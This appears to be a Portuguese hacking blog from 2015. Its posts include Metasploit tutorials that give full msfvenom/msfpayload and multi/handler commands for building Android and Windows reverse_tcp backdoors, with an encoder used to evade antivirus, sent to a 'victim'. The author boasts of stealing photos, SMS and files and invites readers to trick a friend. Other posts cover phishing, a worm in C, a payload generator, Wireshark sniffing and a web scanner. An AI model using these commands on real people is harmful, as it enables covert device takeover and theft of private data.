quinta-feira, 26 de novembro de 2015

Metasploit: invadindo sistema Android ( reverse_tcp ) com [Msfvenon]/[Msfpayload]

Ae galera, hoje eu fiz minha primeira invasao no Android utilizando o Metasploit.


Foi simples, primeiro criei um payload usando o modulo meterpreter/reverse_tcp.


apos isto eu mandei o payload para vitima no caso meu celular.


apos isto eu iniciei o exploit.


exploit/multi/handler


setei o payload que usei ( android/meterpreter/reverse_tcp )


configurei a porta e o IP local, e dei um exploit, apos isto foi so a vitima abrir o payload, e BOMBA, a sessao abriu utilizando o meterpreter.


Com ele ativo, consegui tirar fotos, capturar fotos, SMS, execuçao de programas, baixar arquivos.


Fantastico, voce que quer engana um amigo seu segue a dica ;)


comandos que eu uitlizei:


msfvenon or msfpayload -p android/meterpreter/reverse_tcp LHOST=seuip LPORT=4444(DEFAULT) R > nome do aquivo.apk

 

ele vai estar no diretorio principal, de um "ls".


apos isto mande o payload para vitima.


abra o MSFCONSOLE.


comandos:


use exploit/multi/handler


set PAYLOAD android/meterpreter/reverse_tcp


agora configure sua LHOST dnv


set LHOST seuip


apos isto de um "exploit"


Quando a vitima abrir seu payload ira abrir a sessao e ae voce da um help, e agora so brincar com seu amigo >:D

 

fotos:

 



 

segunda-feira, 9 de novembro de 2015

Phishing

Iae galera, hoje vim mostrar uma apostila para novatos que criei pelo pedido do Alexandre.


Tema: Phishing.









Nela contem;


Oque seria phising ?;

Como se prevenir ?;

Metodos;

Pratica ;



Qualquer erro me desculpe.

Lançarei uma video-aula de phishing para ajudar voces na pratica.



Download  ( Ela foi criada no Linux, mude a extensao ou baixe um leitor. )


Criada por: Jonatas Rockefeller.

quarta-feira, 4 de novembro de 2015

Metasploit: criando payload indetectavel.

Ola a todos, hoje vou mostrar um tutorial de como criar um payload indetectavel.
( So para avisar este tutorial foi baseado em outro "https://pentestlab.wordpress.com/2012/04/16/creating-an-undetectable-backdoor/")








Criando Payload e encodando.






Executando o Exploit.





Quando a vitima acessar o payload vai abrir o meterpreter.






Comandos:



msfpayload windows/meterpreter/reverse_tcp LHOST=[IP LOCAL] LPORT=4555 R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 X> /diretorio/aquivo.bin,exe,jpg

use exploit/multi/handler      [exploit]
set PAYLOAD windows/meterpreter/reverse_tcp   [payload]
set LHOST              [Ip Local]
exploit      



Explicaçoes:


Oque seria um payload ?



Oque seria MSFencode ?

msfencode – um codificador interactivo de payload encoder


Oque seria o Meterpreter ?


Editado por: Jonatas Rockefeller


terça-feira, 3 de novembro de 2015

Worm: Oque seria ?, Como funciona? e um exemplo em C

Ola a todos, hoje irei mostrar uma mini-apostila em PDF, dando uma basica explicaçao sobre o termo "WORM"


Na apostila vai estar a source do worm em C




Confira o Video:


segunda-feira, 2 de novembro de 2015

Ejacoolas: criando payload em java.

Iae galera, nesta vez irei mostrar um script muito util.

ele se chama Ejacoolas, ele cria um payload que usa o modulo reverse_tcp



Primeiro abra ele.




Apos abri-lo, iremos digitar o nome do payload:




Agora aperte ENTER, mais se ele nao identificar, voces coloquem o IP local de voces:





Agora vamos selecionar a porta, no caso a default.





Apos isto o programa ira gerar o payload, voce tera que mandar o paylaod para alguma vitima, quando ela abrir voce tera alguns privilegios sobre a maquina da vitima.




Feito por: Jonatas Rockefeller.

domingo, 1 de novembro de 2015

Sniffando com Wireshark [ Windows/Linux ]

Oque é Sniff?


Sniffing, em rede de computadores, é o procedimento realizado por uma ferramenta conhecida como Sniffer (também conhecido como Packet SnifferAnalisador de Rede,Analisador de ProtocoloEthernet Sniffer em redes do padrão Ethernet ou ainda Wireless Sniffer em redes wireless). Esta ferramenta, constituída de um software ouhardware, é capaz de interceptar e registrar o tráfego de dados em uma rede de computadores. Conforme o fluxo de dados trafega na rede, o sniffer captura cada pacote e eventualmente decodifica e analisa o seu conteúdo de acordo com o protocolo definido em um RFC ou uma outra especificação.
sniffing pode ser utilizado com propósitos maliciosos por invasores que tentam capturar o tráfego da rede com diversos objetivos, dentre os quais podem ser citados, obter cópias de arquivos importantes durante sua transmissão, e obter senhas que permitam estender o seu raio de penetração em um ambiente invadido ou ver as conversações em tempo real.

Oque iremos usar ?


Wireshark
Plataforma: Windows/ Linux


Para começar:


iremos abrir o Wireshark, e em Seguida selecionar nossa placa de rede.



Após selecionar a rede, vamos em Start.



Ele irá capturar protocolos, informações sobre oque você está acessando.

Agora no campo Filter, iremos colocar "dns", ele trará todos DNS executados.



Agora iremos abrir o Prompt de Comando e iremos digitar:

$ nslookup
$ host/ip do site que vocêr quer obter informações.



Após digitar, o Wireshark irá mostrar as informações da host que você capturou.


Isto é apenas uma demonstração básica.




feito por: Jonatas Rockefeller.

Scrawlr: Explorando vulnerabilidades [Windows]

Olá á todos, hoje irei mostrar um programa feito pela empresa HP ( Hewlett-Packard )

ele se chama Scrawlr, ele busca por páginas, vulnerabilidades web.



Explorando:







Resultado:




Ele trará sites que são ligados ao meu target, no caso não foi achado nenhuma brecha.



"Download"

Introdução

Introdução:


Este blog foi feito para ajudar a todos e compartilhar conhecimento.

Ele está focado na aréa da segurança da informação





Ainda postarei vídeos no canal no Youtube, mais irei postar mais aqui.

Se der vou chamar uns amigos para compartilhar conhecimento aqui.

Espero que gostem.



Canal no Youtube: